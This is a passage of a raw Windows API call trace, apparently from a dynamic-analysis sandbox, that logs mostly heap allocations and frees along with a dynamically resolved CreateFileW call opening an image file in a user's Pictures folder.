Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0090.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0090.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0090.299] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.299] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0090.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0090.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0090.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0090.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0090.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0090.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0090.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0090.300] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0090.300] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0090.352] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0090.352] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.353] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.353] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.354] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0090.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.355] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0090.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca460 [0090.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca460, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0090.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.355] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0090.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0090.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0090.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0090.357] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\wWIF_SR6x0w3shayx.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\wwif_sr6x0w3shayx.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0090.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0090.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0090.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0090.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0090.359] FreeLibrary (hLibModule=0x772d0000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0090.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.360] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.360] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0090.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0090.361] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0090.361] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 